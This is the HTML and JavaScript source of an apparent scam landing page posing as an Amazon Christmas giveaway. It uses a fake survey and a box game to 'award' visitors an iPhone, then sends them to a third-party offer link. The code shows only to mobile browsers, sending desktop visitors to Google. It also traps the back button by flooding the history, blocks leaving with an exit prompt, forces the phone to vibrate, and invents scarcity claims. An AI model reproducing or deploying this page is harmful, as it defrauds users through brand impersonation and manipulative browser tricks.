
<!doctype html>
<html lang="en" dir="ltr">

<script>
            if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {
            } else {
                window.location.href = "https://www.google.com";
            }
        </script>
        
<head>



<title>AMZ EN CRS 2024</title>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="lander" content="survey-pick-a-box">
<meta name="description" content="survey-pick-a-box">
<link rel="shortcut icon" href="data:image/x-icon" type="image/x-icon">
<meta property="og:title" content="🎄Amazon - Christmas Giveaway 🎅" />
	<meta property="og:type" content="website" /> 
	<meta property="og:url" content="https://amazon.com" />
	<meta property="og:image" content="https://zaget.cc/amznchristmas/USc0l8y.jpeg" />
	<meta property="og:description" content="Free Gifts for EVERYONE 🎁" />
	<link rel="image_src" href="https://zaget.cc/amznchristmas/USc0l8y.jpeg" />
	<meta property="og:image" content="https://zaget.cc/amznchristmas/USc0l8y.jpeg" />
	<meta name="twitter:image:src" content="https://zaget.cc/amznchristmas/USc0l8y.jpeg>
	<meta name="twitter:image" content="https://zaget.cc/amznchristmas/USc0l8y.jpeg">
	<link rel="icon" href="https://zaget.cc/amznchristmas/USc0l8y.jpeg"> 
<link href="app1.css?id=2fbe2d9a9a40ca9b2489" type="text/css" rel="stylesheet" />
<link href="app.css?id=cfc27b22c2dc71691640" type="text/css" rel="stylesheet" />
<meta name="robots" content="noindex,nofollow">

</head>
<img src='https://pincdn.pages.dev/anOPSjC.png' width='100%'/>
<img src='https://pincdn.pages.dev/fVcHvUd.jpeg' width='100%'/>
  

<style>
    
    @import url("https://fonts.googleapis.com/css2?family=Poppins:wght@400;700&display=swap");

* {
    margin: 0;
    padding: 0;
    font-family: Poppins, Droid Arabic Naskh;
    font-weight: 14px;
    box-sizing: border-box;
  text-align:center;


}
   html,
            body {
                font-size: 16px;
                width: 100%;
                height: 100%;
                padding: 0;
                margin: 0;
                
                -webkit-text-size-adjust: 100%;
                -webkit-tap-highlight-color: transparent;
            }
 
    </style>
<body>


<div class="app" id="app" v-cloak>
<vue-modal v-show="!showRotator && !showPrize" :open="showOpeningModal" class="opening-modal">
<img class="opening-modal__image" src="https://pincdn.pages.dev/ZyaivZa.png" alt="Apple iPhone 13 Pro Max" />
<h1 class="heading heading--h1">
Congratulations!
</h1>
<p class="paragraph">
On the occasion of CHRISTMAS🎅🎄, You have been chosen among the few to receive a free prize.
</p>
<p class="paragraph">
</p><br>
<button class="button" v-on:click="showOpeningModal = false; $confetti.stop()">
CONTINUE
</button>
</vue-modal>
<vue-modal :open="showInstructionsModal">
<img src="https://pincdn.pages.dev/sC2Jjlg.png" style="width: 150px;">
<h2 class="heading heading--h1">Congratulation ! </h2>
 <h4 class="heading heading--h1">Your answers have been saved</h4>
<p class="paragraph">
This is your chance!
<br><br>
You must select the box with the gift inside it.
<br><br>
you've got 3 attempts, Good luck! 
</p><br>
<button class="button" v-on:click="showInstructionsModal = false">
Start now
</button>
</vue-modal>
<vue-modal :open="showFailModal">
<img src="https://pincdn.pages.dev/sC2Jjlg.png" style="width: 150px;">
<h1 class="heading heading--h1">Better luck next time</h1>
<p class="paragraph">
You have (2) extra chances. 
</p><br>
<button class="button" v-on:click="showFailModal = false">
OK
</button>
</vue-modal>
<vue-modal :open="showSuccessModal">
<img src="https://pincdn.pages.dev/w0B8amc.png" style="width: 200px;">
<h1 class="heading heading--h1">Congratulations! </h1>
  <h3 class="heading heading--h1">You did it! you won : </h3>

<p class="paragraph">

( Apple iPhone 16 - 256GB )
<br>
<br>Follow the instructions on the next page to claim your prize ! 
</p><br>
<button class="button" onclick="go();">
NEXT</button>
</vue-modal>
<div class="left">
<div class="product-preview">
<div class="product-preview__title">
</div>

</div>
</div>
<div class="right">
<vue-box-picker v-if="showBoxPicker" :vertical-items="4" lid-image="https://pincdn.pages.dev/gA8VSUi.png" box-image="https://pincdn.pages.dev/hjOKs3A.png" box-back-image="https://pincdn.pages.dev/dufSP4Y.png" prize-image="https://pincdn.pages.dev/6M1iAtC.png" v-on:fail="onBoxPickerFail" v-on:success="onBoxPickerSuccess" :horizontal-items="3" :max-clicks="2"></vue-box-picker>
<div class="verify" v-if="showRotator">
<vue-text-rotator v-on:rotate="rotate" v-on:finished="onRotatorFinished" :strings='[
                     "Please wait ...",
              "Please wait ...",
              "Please wait ..."
            ]'>
</vue-text-rotator>
<div class="verify__text" v-if="rotateIndex > 1">
<strong>
You have answered all of the questions.
</strong>
<img class="verify__icon verify__icon--checked" src="https://pincdn.pages.dev/F8tkJ0o.png" alt="" />
</div>
<div class="verify__text" v-else>
Your answers are being processed
<img class="verify__icon verify__icon--spinner" :class="{'verify__icon--visible' : rotateIndex > 0}" src="https://pincdn.pages.dev/3S99r2P.gif" alt="" />
</div>
<div class="verify__text" v-if="rotateIndex > 2">
<strong>
There are still prizes available!
</strong>
<img class="verify__icon verify__icon--checked" src="https://pincdn.pages.dev/F8tkJ0o.png" alt="" />
</div>
<div class="verify__text" v-else>
Looking for gifts.. 
<img class="verify__icon verify__icon--spinner" :class="{'verify__icon--visible' : rotateIndex > 1}" src="https://pincdn.pages.dev/3S99r2P.gif" alt="" />
</div>
<div class="verify__text" v-if="rotateIndex > 3">
<strong>
Only (1344) gifts remain!
</strong>
<img class="verify__icon verify__icon--checked" src="https://pincdn.pages.dev/F8tkJ0o.png" alt="" />
</div>
<div class="verify__text" v-else>
Stock is being checked
<img class="verify__icon verify__icon--spinner" :class="{'verify__icon--visible' : rotateIndex > 2 }" src="https://pincdn.pages.dev/3S99r2P.gif" alt="" />
</div>
</div>
<vue-survey v-if="showSurvey" :show-steps="true" :questions='[
           {
              title: "Do you know amazon?",
              answers: [ { text: "YES" }, { text: "NO" } ]
            },
                                                             {
              title: "Whats your gender? ",
              answers: [ { text: "MALE" }, { text: "FEMALE" } ]
            },
            {
              title: "How old are you?",
              answers: [ { text: "18-21" }, { text: "22-29" }, { text: "30-39" }, { text: "40-59" }, { text: "60+" } ]
            },
                                                                         {
              title: "How would you rate amazon? ",
              answers: [ { text: "AMAZING" }, { text: "VERY GOOD" }, { text: "GOOD" }, { text: "NOT GOOD" } ]
            },
            {
              title: "Would you recommend us to your friend? ",
              answers: [ { text: "YES" }, { text: "NO" } ]
            },
          ]' v-on:finish="onSurveyFinish"></vue-survey>
</div>
</div>


<script>window.view = window.view || {};view.offerUrl = "https:\/\/rdr.funcontent.xyz/click";view.qs = null;view.skip = 0;view.screenshot = 0;view.download = 1;view.noredir = false;</script> <script src="app1.js?id=d41d8cd98f00b204e980" type="application/javascript"></script>
<script src="app.js?id=17138759790b445ece6b" type="application/javascript"></script>
<script>
function go() {
    window.onbeforeunload = null;
	window.open('amshare');
    window.location = '#';
}
</script>
  
  <script>
var PreventExitPop = true;

function ExitPop() {
    if (PreventExitPop != false) {
        return "Don't miss out!";
    }
}
window.onbeforeunload = ExitPop;
</script>
<script>
    ! function() {
    var t;
    try {
        const URL = window.location.href.split(/[#]/)[0];
        for (t = 0; 10 > t; ++t) history.pushState({}, "", URL + '#')
        onpopstate = function(event) {
            event.state && location.replace('#');
        }
    } catch (o) {
        console.log(o);
    }
}();
</script>
  
<script>
	navigator.vibrate([1000, 300, 1000, 300,1000]);
</script>
  <img src='https://pincdn.pages.dev/DQ5UllP.jpeg' width='100%'/>
  <!-- Histats.com  START  (aync)-->
<script type="text/javascript">var _Hasync= _Hasync|| [];
_Hasync.push(['Histats.start', '1,4777589,4,0,0,0,00010000']);
_Hasync.push(['Histats.fasi', '1']);
_Hasync.push(['Histats.track_hits', '']);
(function() {
var hs = document.createElement('script'); hs.type = 'text/javascript'; hs.async = true;
hs.src = ('//s10.histats.com/js15_as.js');
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(hs);
})();</script>
<noscript><a href="/" target="_blank"><img  src="//sstatic1.histats.com/0.gif?4777589&101" alt="counter" border="0"></a></noscript>
<!-- Histats.com  END  -->
</body>
</html>
